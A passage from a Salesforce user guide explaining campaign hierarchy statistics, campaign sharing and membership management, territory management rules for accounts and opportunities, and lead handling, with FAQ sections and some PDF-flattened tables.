rates, and that amount displays in parentheses.

This field cannot be referenced in formulas for workflow rules,
validation rules, field updates, or approval processes, but it can
be referenced in custom formula fields. Updates to this field
do not trigger workflow rules.

Calculated field for amount of all closed/won opportunities
associated with the campaign hierarchy. (Read only) Salesforce

Total Value Won Opportunities in Hierarchy

automatically calculates this amount using all associated records
regardless of whether you have read access to them.

All campaigns in a hierarchy must use the same currency.

For organizations using multiple currencies, opportunity
amounts are converted to the campaign currency. If your
currency does not match the campaign currency, the amount
is converted to your currency.

For organizations using advanced currency management,
opportunity amounts are converted to the campaign currency
via dated exchange rates. If the campaign currency does not
match your currency, the total of the opportunity amounts are
converted using standard exchange rates, not dated exchange
rates, and that amount displays in parentheses.

This field cannot be referenced in formulas for workflow rules,
validation rules, field updates, or approval processes, but it can
be referenced in custom formula fields. Updates to this field
do not trigger workflow rules.

Calculated field for the total number of won opportunities
associated with the campaign hierarchy. Salesforce

Total Won Opportunities in Hierarchy

automatically calculates this amount using all associated records
regardless of whether you have read access to them. This field
cannot be referenced in formulas for workflow rules, validation
rules, field updates, or approval processes, but it can be
referenced in custom formula fields. Updates to this field do
not trigger workflow rules.

Type of campaign, for example, Direct Mail or Referral
Program. Entry is selected from a picklist of available values,

Type
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which are set by an administrator. Each picklist value can have
up to 40 characters.

See Also:
Displaying and Editing Campaigns
Creating Campaigns

Sharing Campaigns

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on campaignsTo view campaigns:

“Read” on campaigns

AND

Marketing User checked in your user information

To share campaigns:

Your administrator defines your organization's sharing model for campaign access. However, you can extend sharing privileges
for your own campaigns individually. Use campaign sharing to increase access to your campaigns; you cannot restrict access
beyond your organization’s default access levels.

To view and manage sharing details, click Sharing on the campaign detail page. The Sharing Detail page lists the users,
groups, roles, and territories that have sharing access to the campaign. On this page, you can do any of the following:

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views. To edit or delete any view you created, select it from the View drop-down list and click Edit.

• Click Add to grant access to the record for other users, groups, roles, or territories.

• Click Expand List to view all users that have access to the record.

• For manual sharing rules that you created, click Edit or Del next to an item in the list to edit or delete the access level.

Special Considerations

• To share a campaign, you must have Public Full Access to the campaign and have the Marketing User checkbox selected
in your personal information.

• The Sharing button is available depending on your organization-wide default for campaigns.
• Make sure you are sharing records with users who have the appropriate “Read” object permission for viewing the shared

records.
• Sharing a campaign does not automatically grant read access to all the campaign members. Make sure that the user you

are sharing a campaign with has visibility to the associated leads or contacts.
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• The campaign hierarchy statistic fields provide aggregate data for a parent campaign and all the campaigns below it in the
hierarchy, regardless of whether a user has sharing rights to a particular campaign within the hierarchy. Therefore, consider
your organization's campaign sharing settings when enabling campaign hierarchy statistics. If you do not want users to see
aggregate hierarchy data, remove any or all of the campaign hierarchy statistic fields from the Campaign Hierarchy related
list. These fields will still be available for reporting purposes.

See Also:
Viewing Campaign Hierarchies
Viewing Campaign Hierarchy Statistics

Deleting Campaigns

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Delete” on campaigns

AND

Marketing User checked in your user information

To delete campaigns:

To delete a campaign, click Del next to the campaign on the campaigns list page. You can also delete a campaign by clicking
Delete on the campaign detail page.

When you delete a campaign, all related events, tasks, and attachments are also deleted. Associated contacts, leads, person
accounts, and opportunities are not deleted with the campaign. The deleted campaign is moved to the Recycle Bin. If you
undelete the campaign, any related items are also restored.

See Also:
Displaying and Editing Campaigns

Searching for Campaigns

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on campaignsTo view campaigns:

1. Enter your search terms in the sidebar or header search box.
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2. Click Search.
3. From the search results, click an item to open it or click Edit, if available.

You can also create a campaign list view to find campaigns that match specific criteria.

See Also:
Campaigns Home
Displaying and Editing Campaigns

Mass Adding Contacts or Leads to a Campaign

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Marketing User checked in your user information

AND

“Edit” on campaigns

AND

“Read” on contacts

To add multiple existing contacts to a campaign:

Marketing User checked in your user information

AND

“Edit” on campaigns

AND

“Read” on leads

To add multiple existing leads to a campaign:

Marketing User checked in your user information

AND

“Edit” on campaigns

AND

“Read” on contacts

To add multiple person accounts to a campaign:

To add existing contacts, leads, or person account to a campaign from a campaign detail page:

1. View the campaign you want to update.
2. Click Manage Members.
3. Click either Add Members - Existing Contacts or Add Members - Existing Leads.
4. In the first step of the wizard, choose a campaign member status value to assign to the new members.
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Note that the name of the campaign from which you navigated is automatically populated.

5. Click Next.
6. In the second step of the wizard, you see a list of potential members who are not associated with your campaign.

Note that person accounts are included in contact list views and can be added to campaigns from them.

a. Check the boxes for the records you want to select. Optionally, check the box in the column header to select all currently
displayed items. Note that up to 250 records can display on the page at a time.

b. Click Add to Campaign. This immediately saves those individuals as campaign members with the chosen status.
c. Click the letter links or the Next Page and Previous Page links to view other list pages, and continue adding members

in the same manner.

Note:  A confirmation message keeps a running tally of the total number of members added during this session
of the wizard. Any members already added during this wizard session are shown with a read-only check mark
next to them.

d. Optionally, modify the display by choosing a different list view or creating a new list view. Note that you can define
custom list views that restrict results according to campaign name and optionally also by member status.

7. When you have added all desired members to your campaign, click Done to exit the wizard.

See Also:
Adding Contacts or Leads from a List View to a Campaign
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Mass Removing Contacts or Leads from a Campaign

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Marketing User checked in your user information

AND

“Edit” on campaigns

AND

“Read” on contacts

To delete multiple existing contacts from a campaign:

Marketing User checked in your user information

AND

“Edit” on campaigns

AND

“Read” on leads

To delete multiple existing leads from a campaign:

To remove existing contacts, leads, or person accounts from a campaign:

1. View the campaign detail page for the campaign you want to update.
2. Click Manage Members.
3. Click either Remove Members - Existing Contacts or Remove Members - Existing Leads.
4. Choose the campaign members that you want to remove from the campaign:

a. Check the boxes for the records you want to select. Optionally, check the box in the column header to select all currently
displayed items. Note that up to 250 records can display on the page at a time.

b. Click Remove from Campaign.
c. Click the letter links or the Next Page and Previous Page links to view other list pages, and continue removing members

in the same manner.

Note:  A confirmation message keeps a running tally of the total number of members removed during this
session of the wizard. Any members already removed during this wizard session are shown with a read-only
check mark next to them.

d. Optionally, modify the display by choosing a different list view or creating a new list view. Note that you can define
custom list views that restrict results according to campaign name and optionally also by member status.

5. When you are finished removing members from your campaign, click Done to exit the wizard.

See Also:
Mass Adding Contacts or Leads to a Campaign
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PLANNING, MANAGING, AND TRACKING CAMPAIGNS FAQS

Campaigns FAQ
Available in: Professional, Enterprise, Unlimited, and Developer Editions

• Can I use mass email for my email campaigns?

• How can I track which opportunities resulted from campaigns?

• How can I calculate the ROI for my campaigns?

• How can I add contacts and leads to my campaigns?

• How does Primary Campaign Source work?

• How is Campaign influence different from ROI reports?

• Who has access to campaigns?

See Also:
Campaigns Overview

Can I use mass email for my email campaigns?
Mass email is designed for small-scale sales and support mailings, not for marketing purposes. We recommend that you use
a third-party email-execution vendor to send emails for marketing campaigns.

See Also:
Campaigns FAQ

How can I add contacts and leads to my campaigns?
Your company's campaigns typically will target existing customers (contacts) and/or prospective customers (leads). Both
contacts and leads can be associated with your campaigns as campaign members. You can easily add members from a campaign
member detail page by clicking the Manage Members drop-down button in the campaign detail section or in the Campaign
Members related list, then selecting one of the following options:

• Add Members - Search to add campaign members from a search.
• Add Members - Import File to add campaign members by importing leads from a comma-delimited text file (.csv).
• Edit Members - Search to view, update, or delete existing campaign members.
• Update & Add Members - Import File to edit campaign member status using an import file.

The following tables describe additional methods to add campaign members.
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Adding Contacts to Campaigns

Maximum Number of RecordsRecommended Campaign Member
Tool

Contact Source

50,000 per reportAdd Campaign Members from ReportsA report of existing contacts

50,000 per import fileCampaign Update WizardA .csv file of existing contacts

250 per list pageAdding Contacts or Leads from a List
View to a Campaign

A list view of existing contacts

1Adding, Editing, or Cloning Individual
Campaign Members

An individual contact detail page

Adding Leads to Campaigns

Maximum Number of RecordsRecommended Campaign Member
Tool

Lead Source

50,000 per reportAdd Campaign Members from ReportsA report of existing leads

50,000 per import fileLead Import WizardA .csv file of new leads

250 per list pageAdding Contacts or Leads from a List
View to a Campaign

A list view of existing leads

1Adding, Editing, or Cloning Individual
Campaign Members

An individual lead detail page

See Also:
Campaigns FAQ

How can I calculate the ROI for my campaigns?
The Campaign ROI Analysis Report is located on the Reports tab in the Campaign Reports folder. It calculates your campaigns'
performance by return on investment (ROI) and average cost. For each campaign in the report:

• ROI, which is expressed as a percentage, is calculated as the net gain (Total Value Won Opportunities - Actual Cost)
divided by the Actual Cost.

• Total Value Won Opportunities is the calculated amount of all closed or won opportunities where the campaign is the
Primary Campaign Source on the opportunity.

See Also:
Campaigns FAQ
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How can I track which opportunities resulted from
campaigns?

One key benefit of campaigns is the ability to track how much business has been generated from each campaign. When you
create an opportunity, you can fill in the Primary Campaign Source field to indicate that the opportunity resulted from
a specific campaign.

In addition, when you convert a lead that is linked to a campaign, that campaign is automatically inserted into the opportunity
Primary Campaign Source field.

If a lead or contact is linked to multiple campaigns, the campaign with which he or she is most recently associated is inserted
into the opportunity Primary Campaign Source field.

The Opportunities related list on a campaign shows every opportunity that is linked to that campaign. You can also run the
Campaign Revenue Report to track which opportunities are linked to your campaigns.

See Also:
Campaigns FAQ

How does Primary Campaign Source work?
Primary Campaign Source is the campaign associated with a lead prior to lead conversion. This value can be manually changed
in the lead detail. Additionally, it provides 100% of the amount revenue credit to the specified campaign.

See Also:
Campaigns FAQ

How is Campaign influence different from ROI reports?
Campaign influence tracks pipeline and revenue for multiple campaigns, and ties all campaigns of a contact role to that
opportunity for pipeline and ROI reporting. This is especially helpful for longer deal cycles when more than one campaign
contributes to a closed deal or a converted lead.

See Also:
Campaigns FAQ

Who has access to campaigns?
Depending on your sharing settings, users in your organization can view campaigns, view the advanced campaign setup, or
run campaign reports. However, only designated Marketing Users with the appropriate user permissions can create, edit, and
delete campaigns and configure advanced campaign setup. An administrator must select the Marketing User checkbox on
a user’s personal information to designate that user as a Marketing User.
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In addition, Marketing Users can import leads and use the campaign import wizards if they also have the Marketing User
profile (or the “Import Leads” permission and “Edit” on campaigns).

See Also:
Campaigns FAQ

MANAGING ACCOUNTS BY TERRITORY

Territory Management Overview
Available in: Enterprise, Unlimited, and Developer Editions

Note: Territory Management is available only with Customizable Forecasts and not supported with the Winter ’12
release of Forecasts. If Territory Management is enabled, you can no longer use the Winter ’12 release of Forecasts.

Territory management is an account sharing system that grants access to accounts based on the characteristics of the accounts.
It enables your company to structure your Salesforce data and users the same way you structure your sales territories. Particularly
if your organization has a private sharing model, you may need to grant users access to accounts based on criteria such as postal
code, industry, revenue, or a custom field that is relevant to your business. You may also need to generate forecasts for these
diverse categories of accounts. Territory management solves these business needs and provides a powerful solution for structuring
your users, accounts, and their associated contacts, opportunities, and cases.

Note:  Account ownership and its effect on record sharing remains valid and unchanged when territory management
is in use.

Key benefits of territory management include:

• The ability to use account criteria to expand a private sharing model.

• Support for complex and frequently changed sales organization structures.

• Support for transferring users between territories, with the option to retain opportunities.

• Multiple forecasts per user, based on territory membership.

• Territory-based sales reports.

Note:  Territory management only affects accounts and the standard objects that have a master-detail relationship to
accounts. For example, opportunities are included in territory management but leads are not.

What is a Territory?

A territory is a flexible collection of accounts and users where the users have at least read access to the accounts, regardless of
who owns the account. By configuring territory settings, users in a territory can be granted read, read/write, or owner-like
access (that is, the ability to view, edit, transfer, and delete records) to the accounts in that territory. Both accounts and users
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can exist in multiple territories. You can manually add accounts to territories, or you can define account assignment rules that
assign accounts to territories for you.

Not only can you control access to accounts for users in each territory, you can also control users’ access to the opportunities
and cases associated with the accounts in the territory, regardless of who owns the records.

What is a Territory Hierarchy?

Territories exist in a hierarchy which you can set up with as many nested levels as you wish. For example, you could create a
top-level territory named “Worldwide Sales” that has the child territories “North America,” “Europe/Middle East,” “Latin
America,” “Africa,” and “Asia/Australia.” “North America” might have the child territories “Canada” and “United States.“
“United States” might have the child territories “Western,” “Central,” “Southern,” and “Eastern.” Finally, “Western” might
have the child territories “California,” “Oregon,” “Washington,” “Nevada,” “Arizona,” and “Utah.”

Note that territory hierarchies do not have to be focused on geography; they can be defined however you like.

How Do Territories Affect Forecasting?

When you enable territory management for your organization, your forecast data is derived from the opportunities that are
associated with the accounts in your territories. Users will have a different forecast for each territory to which they are assigned.
For example, if you are assigned to both “California” and “Arizona,” you will have one forecast for the opportunities you have
in “California,” and another forecast for the opportunities you have in “Arizona.” See Viewing Customizable Forecasts on
page 1202.

See Also:
Managing Territories
Building Your Territory Hierarchy
Territory Management FAQ

Managing Territories
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Territories”

OR

You are a forecast manager, Forecast managers can
manage territories is selected, and you are working
below your position in the territory hierarchy.

To manage territories:

Managing your organization’s territories involves the following tasks:

• Organize territories into hierarchies that represent your organization’s forecasting requirements and how users work in
your organization.

• Configure organization-wide settings for territory management.
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• Create new territories and edit existing territories.

• Assign users to territories.

• Define account assignment rules that evaluate accounts and assign them to territories.

• Select accounts from lists and manually assign them to territories.

See Also:
Territory Management Overview
Enabling Territory Management
Territory Management FAQ

Assigning Opportunities to Territories
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create” on OpportunitiesTo create opportunities:

An opportunity can be assigned to a territory when the opportunity is created—either manually or during lead conversion—or
when account assignment rules run that affect existing opportunities. This topic includes the following sections:

• Territory Assignment for Manually Created Opportunities

• Territory Assignment for Converted Leads

• Notes About Territory Assignment for Opportunities

Territory Assignment for Manually Created Opportunities

When an opportunity is created from the Opportunities tab or from the Quick Create area on the sidebar, Salesforce compares
the territories associated with the opportunity's account to the territories that the opportunity owner is a member of:

• If there is a single territory that both the account and the opportunity owner belong to, the opportunity is assigned to that
territory if “Evaluate this account against territory rules on save” is selected.

• If more than one territory is common to both the account and the opportunity owner, the opportunity is not automatically
assigned to any territory. The opportunity owner must manually assign a territory to the opportunity.

• If no territory is common to both the account and the opportunity owner, the opportunity owner cannot assign the
opportunity to a territory.

Territory Assignment for Converted Leads

When a lead is converted to an opportunity, that opportunity's territory assignment depends on several factors, including:

• Whether the account associated with the opportunity is assigned to one or more territories
• Whether the lead owner is a member of the same territory as the account
• The number of users assigned to a territory
• Whether a forecast manager is assigned to the territory
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If the account associated with the opportunity is assigned to only one territory, use the following table to determine how the
opportunity's territory is assigned:

ResultsA Forecast Manager is
Assigned to the Territory

Number of Users
Assigned to Territory

Lead Owner
Belongs to Same
Territory as
Account

The opportunity is assigned to the same territory
as the account and the lead owner becomes the
opportunity owner.

N/A1Yes

The opportunity is assigned to the same territory
as the account and the opportunity owner is the
sole member of the territory.

N/A1No

The opportunity is assigned to the same territory
as the account and the lead owner becomes the

N/A0No

opportunity owner. The lead owner is added as
an inactive member of the territory.

The opportunity is assigned to the same territory
as the account and the forecast manager becomes
the opportunity owner.

Yes>1Yes

The opportunity is assigned to the same territory
as the account and the lead owner becomes the
opportunity owner.

No>1Yes

The opportunity is assigned to the forecast
manager of the territory.

Yes>1No

The opportunity is assigned to the same territory
as the account and the lead owner becomes the

No>1No

opportunity owner. The lead owner is added as
an inactive member of the territory.

If the account associated with the opportunity is assigned to more than one territory, use the following table to determine how
the opportunity's territory is assigned:

ResultsLead Owner's Territory Membership

The opportunity is not assigned to any territories
and the lead owner becomes the opportunity

Lead owner has one territory in common with the account

owner. The opportunity owner can assign the
opportunity to the account's territory.

The opportunity is not assigned to any territories
and the lead owner becomes the opportunity

Lead owner has more than one territory in common with the account

owner. The opportunity owner can assign the
opportunity to any territory that he or she has in
common with the account.

The opportunity is not assigned to any territories
and the lead owner becomes the opportunity

Lead owner has no territories in common with the account
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ResultsLead Owner's Territory Membership

owner. The opportunity owner cannot assign the
opportunity to any territories.

Notes About Territory Assignment for Opportunities

• The following actions do not change an opportunity's territory:

◊ Manually assigning the opportunity's account to a territory
◊ Changing which account is associated with the opportunity
◊ Changing the account's territory as a result of account assignment rules if the opportunity and its account are in different

territories
◊ Transferring the opportunity to a new owner

• Territory assignment rules do not update an opportunity if the opportunity's Close Date is before the current date and
the opportunity's Stage is Closed Won or Closed Lost.

• When an opportunity is not automatically assigned to a territory, we recommend that users be notified if the opportunity
is not assigned to a territory manually within one day. You can set up time-based workflow to notify users about unassigned
opportunities.

• Restoring an account or opportunity from the Recycle Bin restores the territory assignment, but it does not trigger the
evaluation of account assignment rules. If account assignment rules changed while the record was in the Recycle Bin, the
restored record may have territories that are inconsistent with the new rules.

• When opportunities are transferred from one user to another, whether individually or as a group, the territory assignment
on the opportunities is unaffected. However, if the opportunities are assigned to a user who is not already a member of the
opportunity’s territory, that user is added as an inactive member of the territory.

• When users are removed from a territory, you can specify who should receive their open opportunities. Also, when users
are transferred from one territory to another, you can specify which opportunities the users should continue to own and
select a recipient for any remaining opportunities. If you do not specify a recipient:

◊ If the parent territory has a forecast manager, the forecast manager takes ownership of the user's open opportunities.
The forecast manager is assigned to the territory and Active in Territory is unchecked.

◊ If the parent territory does not have a forecast manager, the user remains in the territory and Active in Territory
is unchecked.

See Also:
Managing Account Assignment Rules
Creating and Editing Account Assignment Rules
Creating Opportunities

976

Assigning Opportunities to TerritoriesCampaigning and Generating Leads



Viewing Manually Assigned Accounts Lists
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view manually assigned account lists:

“Manage Territories”

AND

“Edit” on accounts

OR

You are a forecast manager, Forecast managers can
manage territories is selected, you are working below
your position in the territory hierarchy, and you have “Edit”
on accounts.

To remove accounts:

The manually assigned accounts list page displays a list of accounts assigned to the selected territory. From this page, you can
view detailed account information, remove accounts from territories, and access other related information.

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views.

• Click an account name to view the account detail.

• Click Remove next to an account name to remove the account from the territory.

See Also:
Territory Management Overview
Managing Users in Territories

MANAGING ACCOUNTS BY TERRITORY FAQS

Territory Management FAQ
Available in: Enterprise, Unlimited, and Developer Editions

• How does Salesforce handle territory management?

• Are opportunities transferred to different users when account assignment rules are run?
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• Are the territory hierarchy and the role hierarchy different?

• How are opportunities assigned to territories?

• How do manually assigned accounts differ from those assigned by account assignment rules?

• How does opportunity confinement work?

• Must I be assigned to the same territories as the opportunities I own?

• What happens when I undelete an account or opportunity that was assigned to a territory?

• What kinds of records have territories?

• When do account assignment rules evaluate accounts?

See Also:
Territory Management Overview

How does Salesforce handle territory management?
In Enterprise, Unlimited, and Developer Edition organizations, you can enable territory management to organize your users
into territories and provide access to accounts and their related opportunities and cases.

In Professional Edition organizations, Salesforce’s role hierarchy allows you to manage the roll-up of information among your
company's territories. The hierarchy structure is not based on traditional titles, but rather on a hierarchy of roles. Multiple
people with different titles can be assigned to the same role. Users always have access to the data that is owned by or shared
with users assigned to roles below them in the hierarchy. A user’s role also determines which data is accessible to him or her
in forecasts.

A typical organization may have three levels of roles, for example:

• The top role may include your VPs of sales, marketing, and client services, and your CFO. These users will be able to view
all information at lower levels and perform roll-ups on that information.

• The middle level may include various vice president or regional managers. These roles can access the data owned by or
shared with all users below them in the hierarchy. For example, the Western VP role can view and perform roll-ups of the
information owned by users in the Western Reps role.

• Since no roles are below the various Reps roles, the users in those roles cannot perform any roll-ups or view anyone’s
information except their own.

Note:  Your role hierarchy interacts with your organization’s sharing model to determine exactly what information a
user can see, given the sharing setting is selected to use hierarchies. For forecasts, a user’s role always determines
which information he or she can view, regardless of the sharing model. Likewise, in a Private sharing model, a user’s
role determines his or her access to other users’ data. However, in a Public Read/Write or Public Read Only
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organization, users can view (and edit, for Public Read/Write) information of all other users, in addition to having
access to the data of users below them in the hierarchy.

See Also:
Territory Management FAQ
Territory Management Overview

Are opportunities transferred to different users when
account assignment rules are run?

When account assignment rules cause an opportunity to be reassigned to a territory to which you already belong, you
automatically become the owner of that opportunity when you meet any of the following criteria:

• You are the only member of the territory.
• You are the only forecast manager in the territory.
• You are the only territory member enabled for forecasting.

If none of these criteria are met, the original opportunity owner is added to the territory as an inactive member.

See Also:
Territory Management FAQ

Are the territory hierarchy and the role hierarchy different?
Yes. The territory hierarchy and the role hierarchy are independent. See the following comparison:

Role HierarchyTerritory Hierarchy

Is available by defaultIs available by contacting salesforce.com

Has no impact on forecasting when territory management is
enabled

Determines forecasts

Supports assigning a user to only one roleSupports assigning a user to multiple territories

Affects all other reportsAffects account and opportunity reports

Grants access to records based on ownership. Users receive
whatever access is most permissive across both hierarchies.

Grants access to records regardless of ownership. Users receive
whatever access is most permissive across both hierarchies.

See Also:
Territory Management FAQ

979

Are opportunities transferred to different users when account
assignment rules are run?

Campaigning and Generating Leads



How are opportunities assigned to territories?
Opportunities are automatically assigned to territories based on the following actions:

• Creating a new opportunity

Opportunities that you create are automatically assigned a territory when you meet both of the following conditions:

◊ You belong to or have edit privileges on the same territory as the account on the opportunity.
◊ You have no other territories in common with that account.

For example, if you are in the territories Berkeley and San Francisco and the account is in the territories Portland, San
Francisco, and Seattle, the opportunity will be assigned to the San Francisco territory.

• Running account assignment rules

When account assignment rules are run, opportunities are automatically assigned to the same territory as the account when:

◊ An opportunity does not have a territory and its account is added to a territory.
◊ An account moves from one territory to another. However, if an account assignment rule prohibits opportunities from

moving outside a given part of the territory hierarchy, the opportunities do not move and no longer belong to any
territories.

Opportunities are not automatically assigned to the same territory as the account when:

◊ An account is removed from a territory and not reassigned to a new territory in the same operation. The account's
opportunities from the original territory no longer belong to any territories.

◊ An account is reassigned to multiple territories in one operation. The account's opportunities from the original territory
no longer belong to any territories, unless the Confine Opportunity Assignment checkbox is checked.

Note:  If the opportunity owner is not part of the new territory, he or she is added as an inactive member of the
territory.

The following actions do not change an opportunity's territory:

• Manually assigning the opportunity's account to a territory
• Changing which account is associated with the opportunity
• Changing the account's territory as a result of account assignment rules if the opportunity and its account are in different

territories
• Transferring the opportunity to a new owner.

See Also:
Territory Management FAQ
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How do manually assigned accounts differ from those
assigned by account assignment rules?

Manually assigned accounts are not evaluated when running account assignment rules. After they have been manually assigned
to a territory, they remain there until they are manually removed from the territory.

See Also:
Territory Management FAQ

How does opportunity confinement work?
If the Confine Opportunity Assignment checkbox is selected for a territory, the territory's opportunities remain in the
territory or its child territories when you run account assignment rules. The following exceptions apply:

• If an opportunity's account moves to only one of the territory's children, then the opportunity follows the account and is
reassigned to the account's new territory. This includes when an account moves to multiple territories and only one of the
new territories is a child of the original territory.

• If an opportunity's account moves to more than one of the territory's children, then the opportunity's territory field is set
to blank.

• If an opportunity's account moves completely out of the territory and its children, then the opportunity's territory field is
set to blank.

See Also:
Territory Management FAQ

Must I be assigned to the same territories as the
opportunities I own?

When an open opportunity is assigned to you and you do not belong to that opportunity's territory, you are assigned to the
territory with Active in Territory unchecked in the Assigned Users related list of the territory.

See Also:
Territory Management FAQ
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What happens when I undelete an account or opportunity
that was assigned to a territory?

Undeleting an account or opportunity restores the territory assignment, but does not trigger the evaluation of account assignment
rules. If account assignment rules changed while the record was in the Recycle Bin, the restored record may have territories
that are not consistent with the new rules.

See Also:
Territory Management FAQ

What kinds of records have territories?
Accounts, opportunities, and users have territory fields. Accounts and users can be associated with multiple territories. An
opportunity can be associated with only one territory.

See Also:
Territory Management FAQ

When do account assignment rules evaluate accounts?
Active account assignment rules automatically evaluate accounts and assign them to territories when:

• An account is created using the Salesforce user interface, the Force.com API, or a client such as Connect Offline.
• An account is imported using an import wizard.
• An account is created by the conversion of a lead.
• An account is edited and saved if the Select by default checkbox is selected for the “Evaluate this account

against territory rules on save” checkbox option under Layout Properties. If the account assignment rule
initiates an opportunity ownership change, you must have transfer access on the opportunity.

• An account is edited and saved via the Force.com API.
• Run Rules is clicked on a territory detail page, provided the Exclude from territory assignment rules checkbox

on the account is deselected.
• Save & Run Rules is clicked on the manage account assignment rules page for a territory, provided the Exclude from

territory assignment rules checkbox on the account is deselected.
• Duplicate accounts are merged.

See Also:
Territory Management FAQ
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TRACKING POTENTIAL OPPORTUNITIES AS LEADS

Leads Overview
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

A lead is a prospect or potential opportunity - a person you met at a conference who expressed interest, or someone who filled
out a form on your company’s website.

You can enter leads manually in the Leads tab, or your administrator can import leads or set up Web-to-Lead to gather
information from your company’s website. Users can also import leads via the campaign import wizards if they have the
Marketing User checkbox selected on their user information plus the Marketing User profile (or the “Import Leads”
permission and the “Edit” permission on campaigns).

The Leads tab displays a home page that lets you quickly create and locate leads, and also sort and filter leads using standard
and custom list views. In addition, this tab lets you create and edit leads, associate events and tasks with those leads, and convert
qualified leads into an account, contact, and, optionally, an opportunity.

You can also enhance your traditional lead data with your potential customers’ social information. With the Social Accounts
and Contacts feature, you can see your leads’ social network profiles and other social data directly in Salesforce. Easy access
to this information helps you know your potential customers better, so you can identify and solve their problems and foster
lasting relationships.

See Also:
Leads Home
Tip sheet: Getting the Most from Your Leads

Leads Home
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on leadsTo view Leads tab:

“Read” on leadsTo view leads:

“Create” on leadsTo create leads:

Clicking on the Leads tab displays the leads home page.
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• In the Lead Views section, select a list view from the drop-down list to go directly to that list page, or click Create New
View to define your own custom view.

To view the leads in a queue, choose that queue list from the drop-down list. For every queue your administrator creates,
Salesforce adds a corresponding queue list view.

Note:  The organization-wide sharing model for an object determines the access users have to that object's records
in queues:

Public Read/Write/Transfer

Users can view and take ownership of records from any queue.

Public Read/Write or Public Read Only

Users can view any queue but only take ownership of records from queues of which they are a member or,
depending on sharing settings, if they are higher in the role or territory hierarchy than a queue member.

Private

Users can only view and accept records from queues of which they are a member or, depending on sharing
settings, if they are higher in the role or territory hierarchy than a queue member.

Regardless of the sharing model, users must have the “Edit” permission to take ownership of records in queues
of which they are a member. Administrators, users with the “Modify All” object-level permission for Cases, and
users with the “Modify All Data” permission, can view and take records from any queue regardless of the sharing
model or their membership in the queue.

• In the Recent Leads section, select an item from the drop-down list to display a brief list of the top leads matching that
criteria. From the list, you can click any lead name to go directly to the lead detail. Toggle the Show 25 items and Show
10 items links to change the number of items that display. The fields you see are determined by the “Leads Tab” search
layout defined by your administrator and by your field-level security settings (available in Enterprise, Unlimited, and
Developer Editions only). The Recent Leads choices are:

DescriptionRecent Leads Choice

The last ten or twenty-five leads assigned to you which you
have not yet viewed or edited. This list only includes records
owned by you.

My Unread Leads

The last ten or twenty-five leads you viewed, with the most
recently viewed lead listed first. This list is derived from your

Recently Viewed

recent items and includes records owned by you and other
users.

The last ten or twenty-five leads you created, with the most
recently created lead listed first. This list only includes
records owned by you.

Recently Created

• If Quick Create has been enabled by your administrator, you can add a new lead from the Quick Create area in the sidebar
on the leads homepage. Alternatively, click New next to the Recent Leads section to create a new lead.

• Under Reports, click any report name to jump to that report.

• In the Summary section, choose values and click Run Report to view a summary list of your leads.

• Select any of the links under Tools to manage your leads.
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• If leads are shared with external contacts via Salesforce to Salesforce, choose one of the list views under Leads from
Connections to view leads that your business partners have shared with you.

See Also:
Leads Overview
Managing Leads
Displaying and Editing Leads

Managing Leads
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

Before your organization begins using leads, you can perform the following setup:

• Customize the default Lead Settings.

• Create lead queues to help manage the distribution of leads.

• Set up lead assignment rules to automatically assign leads.

• Set up Web-to-Lead to automatically capture leads from your website.

• Import your organization’s existing leads.

• Create custom lead fields.

• Map custom lead fields to other custom fields for lead conversion.

• Edit the Lead Status picklist to choose the default status for new and converted leads.

See Also:
Leads Overview
Leads Home
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Assigning Leads
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on leadsTo change or accept ownership of leads from a queue:

“Edit” on leads

AND

“Transfer Record” or “Transfer Leads”

To change ownership of leads you do not own that are not in
a queue:

“Read” on leadsTo accept ownership of a lead that is transferred to you:

You can assign leads to users or queues in a variety of ways.

Using an Assignment Rule when Creating or Editing a Lead

Your administrator can create a lead assignment rule to automatically assign leads to different users or queues. Without
a lead assignment rule, the system assigns all new web-generated leads to the Default Lead Owner defined on the Lead
Settings page.

Your administrator can assign new web-generated leads using the Web-to-Lead setup, or when creating or editing a
lead, you can check a box to assign the lead automatically using your active lead assignment rule. An email is automatically
sent to the new owner if your administrator specified an email template in the matching rule entry. If you want this
checkbox to be selected by default, your administrator can modify the appropriate page layout.

Importing Leads

When importing new leads, your administrator can apply a lead assignment rule to automatically assign leads to users
or queues based on values in certain lead fields. Alternatively, your administrator can add a Record Owner field to the
import file to assign lead ownership. Without a lead assignment rule or Record Owner field, imported leads are
automatically assigned to the user doing the import.

Creating a Lead Manually (default assignment)

When you manually create a lead from the Leads tab, you are automatically listed as the owner of the lead.

Taking Leads from a Queue

To take ownership of leads in a queue, go to the queue list view, check the box next to one or more leads, and click
Accept.

Changing Ownership of One Lead

To change the ownership of a lead you own or have read/write sharing access to, click the Change link next to the Lead
Owner field, and then specify the name of a user or queue. The Change link only displays on the lead detail page, not
the edit page. Select the Send Notification Email box to send an automated email to the new lead owner. If the
new owner is a queue, Salesforce sends the email to all of the queue members.
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Changing Ownership of Multiple Leads

You can transfer ownership of multiple leads if you have the “Transfer Leads” or “Transfer Record” permission, the
“Edit” object permission on leads, and sharing access to view the leads. To transfer ownership of multiple leads, use
either of the following methods:
• From a list view or queue, select one or more leads and click Change Owner.
• Use the mass transfer tool from Setup at Data Management > Mass Transfer Records.

All leads that are assigned to you, either manually, via import, or from the web, are automatically marked as “Unread;” that
is, they have a check mark in the Unread column on leads list views. So to view your new leads, select the My Unread leads
list view. Leads are automatically marked as “Read” only after you view or edit them.

If your organization uses divisions, leads that are assigned via assignment rules are automatically set to the default division of
the new owner.

See Also:
Leads Overview

Viewing Lead Lists
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on leadsTo view leads:

“Create” on leadsTo create leads:
